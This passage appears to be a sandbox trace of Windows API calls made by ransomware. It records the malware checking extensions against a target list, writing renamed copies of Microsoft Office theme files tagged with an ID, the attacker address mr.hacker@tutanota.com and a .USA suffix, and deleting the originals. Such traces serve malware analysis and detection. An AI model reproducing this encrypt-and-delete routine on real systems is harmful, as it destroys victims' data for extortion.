lstrlenW (lpString=".7z") returned 3 [0271.015] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.015] lstrlenW (lpString=".dbf") returned 4 [0271.015] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.015] lstrlenW (lpString=".1cd") returned 4 [0271.015] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0271.015] lstrlenW (lpString=".jpg") returned 4 [0271.015] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.016] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.016] lstrlenW (lpString="Opulent.eftx") returned 12 [0271.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.062] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=32857) returned 1 [0271.062] CloseHandle (hObject=0x3a8) returned 1 [0271.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx")) returned 0x20 [0271.107] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0271.117] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.117] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0271.117] GetLastError () returned 0x0 [0271.117] ReadFile (in: hFile=0x39c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x8059, lpOverlapped=0x0) returned 1 [0271.133] WriteFile (in: hFile=0x348, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x8060, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x8060, lpOverlapped=0x0) returned 1 [0271.135] ReadFile (in: hFile=0x39c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.135] WriteFile (in: hFile=0x348, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.135] SetEndOfFile (hFile=0x348) returned 1 [0271.135] CloseHandle (hObject=0x348) returned 1 [0271.135] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.135] SetEndOfFile (hFile=0x39c) returned 1 [0271.137] CloseHandle (hObject=0x39c) returned 1 [0271.137] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx")) returned 1 [0271.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.138] lstrlenW (lpString=".doc") returned 4 [0271.138] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.138] lstrlenW (lpString=".docx") returned 5 [0271.138] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.138] lstrlenW (lpString=".pdf") returned 4 [0271.138] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.138] lstrlenW (lpString=".xls") returned 4 [0271.138] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.138] lstrlenW (lpString=".xlsx") returned 5 [0271.138] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.138] lstrlenW (lpString=".ppt") returned 4 [0271.138] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.138] lstrlenW (lpString=".zip") returned 4 [0271.138] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString=".rar") returned 4 [0271.139] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString=".bz2") returned 4 [0271.139] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString=".7z") returned 3 [0271.139] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.139] lstrlenW (lpString=".dbf") returned 4 [0271.139] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.139] lstrlenW (lpString=".1cd") returned 4 [0271.139] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.139] lstrlenW (lpString=".jpg") returned 4 [0271.139] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.139] lstrlenW (lpString=".doc") returned 4 [0271.139] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString=".docx") returned 5 [0271.139] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.139] lstrlenW (lpString=".pdf") returned 4 [0271.139] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString=".xls") returned 4 [0271.139] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.139] lstrlenW (lpString=".xlsx") returned 5 [0271.139] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.139] lstrlenW (lpString=".ppt") returned 4 [0271.139] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.140] lstrlenW (lpString=".zip") returned 4 [0271.140] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.140] lstrlenW (lpString=".rar") returned 4 [0271.140] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.140] lstrlenW (lpString=".bz2") returned 4 [0271.140] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.140] lstrlenW (lpString=".7z") returned 3 [0271.140] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.140] lstrlenW (lpString=".dbf") returned 4 [0271.140] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.140] lstrlenW (lpString=".1cd") returned 4 [0271.140] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned 79 [0271.140] lstrlenW (lpString=".jpg") returned 4 [0271.140] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.140] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.140] lstrlenW (lpString="Oriel.eftx") returned 10 [0271.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0271.195] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=43193) returned 1 [0271.195] CloseHandle (hObject=0x2ac) returned 1 [0271.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx")) returned 0x20 [0271.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.213] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.213] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.214] GetLastError () returned 0x0 [0271.214] ReadFile (in: hFile=0x398, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0xa8b9, lpOverlapped=0x0) returned 1 [0271.216] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xa8c0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xa8c0, lpOverlapped=0x0) returned 1 [0271.217] ReadFile (in: hFile=0x398, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.217] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0271.217] SetEndOfFile (hFile=0x3a8) returned 1 [0271.217] CloseHandle (hObject=0x3a8) returned 1 [0271.217] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.217] SetEndOfFile (hFile=0x398) returned 1 [0271.222] CloseHandle (hObject=0x398) returned 1 [0271.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx")) returned 1 [0271.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.223] lstrlenW (lpString=".doc") returned 4 [0271.223] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString=".docx") returned 5 [0271.223] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.223] lstrlenW (lpString=".pdf") returned 4 [0271.223] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString=".xls") returned 4 [0271.223] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString=".xlsx") returned 5 [0271.223] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.223] lstrlenW (lpString=".ppt") returned 4 [0271.223] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.223] lstrlenW (lpString=".zip") returned 4 [0271.223] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString=".rar") returned 4 [0271.223] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString=".bz2") returned 4 [0271.223] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.223] lstrlenW (lpString=".7z") returned 3 [0271.223] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.223] lstrlenW (lpString=".dbf") returned 4 [0271.224] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.224] lstrlenW (lpString=".1cd") returned 4 [0271.224] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.224] lstrlenW (lpString=".jpg") returned 4 [0271.224] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.224] lstrlenW (lpString=".doc") returned 4 [0271.224] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString=".docx") returned 5 [0271.224] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.224] lstrlenW (lpString=".pdf") returned 4 [0271.224] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString=".xls") returned 4 [0271.224] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString=".xlsx") returned 5 [0271.224] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.224] lstrlenW (lpString=".ppt") returned 4 [0271.224] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.224] lstrlenW (lpString=".zip") returned 4 [0271.224] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString=".rar") returned 4 [0271.224] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString=".bz2") returned 4 [0271.224] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.224] lstrlenW (lpString=".7z") returned 3 [0271.225] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.225] lstrlenW (lpString=".dbf") returned 4 [0271.225] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.225] lstrlenW (lpString=".1cd") returned 4 [0271.225] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx") returned 77 [0271.225] lstrlenW (lpString=".jpg") returned 4 [0271.225] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.225] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.225] lstrlenW (lpString="Paper.eftx") returned 10 [0271.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.226] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=228746) returned 1 [0271.226] CloseHandle (hObject=0x398) returned 1 [0271.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx")) returned 0x20 [0271.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.226] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.226] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.227] GetLastError () returned 0x0 [0271.227] ReadFile (in: hFile=0x398, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x37d8a, lpOverlapped=0x0) returned 1 [0271.232] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x37d90, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x37d90, lpOverlapped=0x0) returned 1 [0271.268] ReadFile (in: hFile=0x398, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.268] WriteFile (in: hFile=0x3a8, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0271.268] SetEndOfFile (hFile=0x3a8) returned 1 [0271.268] CloseHandle (hObject=0x3a8) returned 1 [0271.268] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.268] SetEndOfFile (hFile=0x398) returned 1 [0271.272] CloseHandle (hObject=0x398) returned 1 [0271.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.285] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx")) returned 1 [0271.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.301] lstrlenW (lpString=".doc") returned 4 [0271.301] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString=".docx") returned 5 [0271.301] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.301] lstrlenW (lpString=".pdf") returned 4 [0271.301] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString=".xls") returned 4 [0271.301] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString=".xlsx") returned 5 [0271.301] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.301] lstrlenW (lpString=".ppt") returned 4 [0271.301] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.301] lstrlenW (lpString=".zip") returned 4 [0271.301] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString=".rar") returned 4 [0271.301] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString=".bz2") returned 4 [0271.301] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString=".7z") returned 3 [0271.301] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.301] lstrlenW (lpString=".dbf") returned 4 [0271.301] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.301] lstrlenW (lpString=".1cd") returned 4 [0271.301] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.302] lstrlenW (lpString=".jpg") returned 4 [0271.302] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.302] lstrlenW (lpString=".doc") returned 4 [0271.302] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString=".docx") returned 5 [0271.302] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.302] lstrlenW (lpString=".pdf") returned 4 [0271.302] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString=".xls") returned 4 [0271.302] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString=".xlsx") returned 5 [0271.302] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.302] lstrlenW (lpString=".ppt") returned 4 [0271.302] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.302] lstrlenW (lpString=".zip") returned 4 [0271.302] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString=".rar") returned 4 [0271.302] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString=".bz2") returned 4 [0271.302] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString=".7z") returned 3 [0271.302] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.302] lstrlenW (lpString=".dbf") returned 4 [0271.302] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.303] lstrlenW (lpString=".1cd") returned 4 [0271.303] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx") returned 77 [0271.303] lstrlenW (lpString=".jpg") 